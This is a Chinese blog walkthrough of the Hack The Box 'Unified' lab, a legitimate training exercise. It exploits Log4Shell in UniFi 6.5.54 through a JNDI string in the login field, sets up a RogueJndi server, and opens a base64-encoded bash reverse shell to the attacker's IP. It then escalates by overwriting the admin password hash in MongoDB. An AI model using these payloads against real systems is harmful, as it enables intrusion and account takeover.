HTB_Unified_log4j_jndi注入&mongodb修改用户hash

于 2023-01-31 09:49:36 发布
阅读量652 收藏
点赞数
分类专栏: # startpoint 文章标签: log4j mongodb 哈希算法 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40927195/article/details/128811787
版权

文章目录

信息收集

nmap -sV -v 这次扫描时间很长,因为默认只扫 1000 个常用端口,如果扫到大端口就会自动扫描全端口,可以自行加速

22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
8443/tcp open  ssl/nagios-nsca Nagios NSCA

SSH 登录尝试失败,6789 端口是 db2 数据库的管理端口,8080 端口是个代理转发端口,访问会重定向到 8443 端口是 UniFi 6.5.54 产品的页面,发现该版本存在 CVE-2021-44228 漏洞

在这里插入图片描述

在这里插入图片描述

漏洞复现

尝试复现 CVE-2021-44228,曾经风靡一时的漏洞 Apache log4j,这是 java 比较常用的日志监控组件

原理就是我们创建一个恶意服务,服务器请求执行,达到控制的目的,以rmi为例

RMI是Java的一组拥护开发 分布式应用程序 的 API 。 RMI使用Java语言 接口 定义了远程对象,它集合了Java序列化和Java远程方法协议 (Java Remote Method Protocol)。 简单地说,这样使原先的程序在同一操作系统的方法调用,变成了不同操作系统之间程序的方法调用

RmiServer.java

package log4j_unser;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServer {
    public static void main(String[] args) throws Exception{
        // 创建远程对象
        RemoteHelloWorld hello = new RemoteHelloWorld();
        // 创建注册表
        Registry registry = LocateRegistry.createRegistry(1099);
        // 将远程对象注册到注册表里面,绑定地址 远程函数实现的是执行弹计算器的命令
        registry.rebind("rmi://127.0.0.1:12345/Hello",hello);
        // registry.rebind("Hello",hello);
    }
}

RemoteHelloWorld接口

package log4j_unser;

import java.rmi.Remote;
import java.rmi.RemoteException;

public interface IRemoteHelloWorld extends Remote {
    public String hello() throws RemoteException;
}

RemoteHelloWorld接口实现

package log4j_unser;

import java.io.IOException;
import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;

public class RemoteHelloWorld extends UnicastRemoteObject implements IRemoteHelloWorld {
    protected RemoteHelloWorld() throws IOException {
        Runtime.getRuntime().exec("calc");
    }

    @Override
    public String hello() throws RemoteException {
        System.out.println("Callback");
        return "Hello";
    }
}

执行RmiServer.java
在这里插入图片描述

漏洞验证

请求登录接口

在这里插入图片描述

修改为

"remember":"${jndi:ldap://10.10.16.18/acxsc}"

在这里插入图片描述

目的是让服务器反向连接我们的攻击机,访问本机的方法

攻击机监听389端口,这是LDAP的默认端口,监听tun0网卡(与目标同一网络),成功连接,存在该漏洞

在这里插入图片描述

漏洞利用

准备payload,输出base64编码

echo 'bash -c bash -i >&/dev/tcp/10.10.16.18/4444 0>&1' |base64 
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTgvNDQ0NCAwPiYxCg==

搭建 ldap 服务器,传递 payload

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,BASE64 STRING HERE}|
{base64,-d}|{bash,-i}" --hostname "{YOUR TUN0 IP ADDRESS}"

在这里插入图片描述

发送数据,工具固定格式

在这里插入图片描述

连接成功

在这里插入图片描述

第二种获取交互式命令行的方法

script /dev/null -c bash

在这里插入图片描述

$flag
cat /home/michael/user.txt

提权

检查mongodb是否在目标机器上运行

ps aux | grep mongo

在这里插入图片描述

尝试读取管理员密码,UniFi程序的默认端口是ace,查询admin表的数据

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

在这里插入图片描述

x_shadow即是密码哈希, SHA-512 算法使用一个以 $6$ 开头的 16 字符字符串盐值进行散列

  • $6$开头的,表明是用SHA-512加密的;

  • $1$开头的,表明是用MD5加密的;

  • $2$开头的,表明是用Blowfish加密的;

  • $5$开头的,表明是用 SHA-256加密的。星号代表帐号被锁定

    ps:是在linux shadow文件才这么表示

由于是散列函数,无法破解,只能使用替换方法

// 加密PassWord1234
mkpasswd -m sha-512 Password1234
$6$YqozzJiM1m7BfLpC$DhsQOccAVLaHIeU3t8cinVUrDH.8SlqT5XsdFpTnq1pGKb.3BbxXP8UOaqiWNqNIEhULcX1YWBGnlHBpnzio..

每次加密会随机生成盐,用于加密

$6$YqozzJiM1m7BfLpC$DhsQOccAVLaHIeU3t8cinVUrDH.8SlqT5XsdFpTnq1pGKb.3BbxXP8UOaqiWNqNIEhULcX1YWBGnlHBpnzio..
$6$:使用sha-512散列函数
$YqozzJiM1m7BfLpC$:随机生成的盐
DhsQOccAVLaHIeU3t8cinVUrDH.8SlqT5XsdFpTnq1pGKb.3BbxXP8UOaqiWNqNIEhULcX1YWBGnlHBpnzio..:加密后的结果, linux中是86位

替换现有hash

mongo --port 27117 ace --eval 'db.admin.update({"_id":
ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"SHA_512 Hash Generated"}})'
# ObjectId("61ce278f46e0fb0012d47ee4")是管理员id

使用修改后的账号密码登录,在设置setting—>site中查看ssh密码,并远程连接,为 root 权限

ssh 10.129.145.178
重返太空
关注
专栏目录
HTB-Unified
weixin_51392885的博客
11-14 961
HTB 内网渗透
HTB-Tier2- Unified
最新发布
32bin的博客
11-21 1519
WebVulnerability AssessmentDatabasesInjectionCustom ApplicationsOutdated SoftwareMongoDBJavaPenetration Tester Level 1ReconaisanceClear Text CredentialsDefault CredentialsCode InjectionSOFT RESETReset MachineOPENWalkthroughONNECTConnect to Starting Point V
htb:Starting Point
LainWith的博客
10-19 1501
第0层部分靶机免费,部分靶机收费。由于这部分太过简单,因此一笔带过。 第一关Meow是telnet靶场:https://www.bilibili.com/video/BV1nS4y137GQ 第二关Fawn是ftp靶场:https://www.bilibili.com/video/BV11F41147Kf 第三关Dancing是SMB靶场:https://www.bilibili.com/video/BV1nS4y137vm 第四关Redeemer是Redis靶场:https://www.theethica
unifi gateway网关部署
布谷鸟
02-25 744
unifi gateway网关部署 unifi gateway 安装 预置条件 unifi gateway 硬件必须先接入网络中 需要单独的节点案子gateway 的控制器controller,controller 要接入Internet 需要在unifi cloud 申请帐号 unifi 初始帐号为 ubnt/ubnt or root/ubnt. 使用controller设置Gateway的登陆帐号 unifi 接入网组网实例 unifi ports 8443 端口不能访问 d
Hack The Box Starting Point 渗透测试入门靶场 TIER 2 - Unified
Start C的博客
05-18 1245
本次探讨在一个非常著名的网络设备监控系统“UniFi”中利用 Log4J 的效果。这台靶机展示了如何设置和安装必要的软件包和工具,以通过滥用 Log4J 漏洞利用 UniFi 并操纵名为 remember 的 POST 标头,为您提供机器上的反向 shell。您还将通过更改系统上运行的 MongoDB 实例中保存的哈希值来更改管理员密码,这将允许访问管理面板并导致管理员的 SSH 密码泄露。 涉及内容:UniFi、CVE检索、Log4JJNDI、LDAP、MongoDB、提权、SSH 废话不多说,开扫:
HTB_tools-开源
05-02
4. **多用户支持**:能够为不同的用户或服务设置独立的带宽限制,实现公平的网络资源分配。 5. **优先级设定**:可以根据业务需求为不同类型的流量设置优先级,如保障视频通话、在线教育等高优先级应用的带宽需求。...
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
《Python库htb_cli-0.1.1-py3-none-any.whl详解及应用》 在Python的世界里,库是开发者的重要工具,它们提供了丰富的功能,极大地提升了开发效率。今天我们将聚焦于一个名为`htb_cli`的Python库,其版本为0.1.1,...
PyPI 官网下载 | htb_cli-0.1.1-py3-none-any.whl
01-05
资源来自pypi官网。 资源全名:htb_cli-0.1.1-py3-none-any.whl
ROS_HTB_优先限速
09-07
标题与描述中的“ROS_HTB_优先限速”是指在MikroTik RouterOS系统中,使用Hierarchical Token Bucket(HTB)算法进行网络流量的优先级管理和限速设置的一种技术。这一策略通常用于确保关键应用或服务的网络质量,...
ROS_HTB_优先限速:提升TCP/443、UDP/8000等端口访问策略
本文档主要介绍了如何在RouterOS v3.0环境下利用高级队列调度(HTB,Hierarchical Token Bucket)技术实现网络流量的优先级限速控制。ROS_HTB_优先限速脚本通过设置IPFirewall mangle链中的规则,对不同类型的网络...
为DB2数据库创建新用户帐户并为其分配特定特权(转载)
solomon_wei的专栏
09-27 1330
目标到目前为止,一直使用实例管理员帐户(SYSADM)来执行所有数据库命令。这个帐户对所有实用程序、数据和数据库对象具有完全访问权。因此,为了避免无意或有意的数据损失,必须要保护这个帐户。在大多数情况下,需要创建不同的用户和/或组,并授予有限的权限集。在本次实验中,将创建一个新的用户帐户,然后为它分配特定的特权。步骤1.通过控制面板打开“管理”菜单项,打开“计算机管理”控制台。2.
Hack The Box - STARTING POINT
小小郭的博客
03-06 2467
Hack The Box - STARTING POINT
IBM DB2常用数据库管理命令
花果山
06-05 5445
命令行窗口#打开命令行窗口db2cmd#打开控制中心db2cmd db2cc#打开命令编辑器db2cmd db2ce 操作数据库命令 #启动数据库实例db2start#停止数据库实例db2stop 如果你不能停止数据库由于激活的连接,在运行db2stop前执行db2 force application all就可以了#创建数据库db2 create db [dbname]#
密码字典生成工具crunch的简单使用
weixin_33755557的博客
09-12 614
为什么80%的码农都做不了架构师?>>> ...
初始化DB2admin密码时,一直报:指定密码太短
冯冰雪的分享
10-27 968
环境:windows server 2019 DB2 版本:v9.5 安装企业版DB2 时,有一个步骤需要初始化db2admin的密码,输入复杂度不高的密码(类似于db2admin这种)时,不被通过。输入很长的字符之后,报错一样 最后尝试。要求应该是:大写小写数字 ,长度>8 而且每个操作系统可能还不相同,我同样的安装包及安装方法在win11 上安装,在初始化这一步骤的时候,输了123456就通过了。 没有具体提示,蛮特殊的,特此记录吧。 ...
安装DB2后,新建db2admin管理员账户Administrator不显示的解决办法。
weixin_34404393的博客
08-04 273
今天装完DB29.7企业版之后,由于新建的db2admin管理员账户, 导致下次开机的时候,Administrator用户隐藏起来了,Ctrl+del+alt才调出登陆窗口,很是麻烦。 解决办法:修改注册表: 开始-运行(Win+R)-regedit,进入注册表编辑器,然后: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows ...
DB2常用命令
凤凰涅磐
05-18 456
1、 打开命令行窗口   #db2cmd 2、 打开控制中心   # db2cmd db2cc 3、 打开命令编辑器  db2cmd db2ce =====操作数据库命令===== 4、 启动数据库实例   #db2start 5、 停止数据库实例   #db2stop  如果你不能停止数据库由于激活的连接,在运行db2stop前执行db2 force ...
DB2ADMIN“ 没有执行操作 “CREATE SCHEMA“ 的特权
weixin_43532218的博客
08-04 2599
0.在使用DBeaver时,创建了一个连接,在连接里创建Schemas时报错显示DB2ADMIN" 没有执行操作 "CREATE SCHEMA" 的特权 1.点开始菜单,在IBM DB2 DB2COPY1目录下找到DB2命令窗口-Administrator,进入管理员命令窗口界面 2.输入db2start 启动DB2 3.将db2连接到之前创建的没有创建Schema权限的连接上 4.输入db2 GRANT DBADM ON DATABASE touser db2admin 其中db2.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值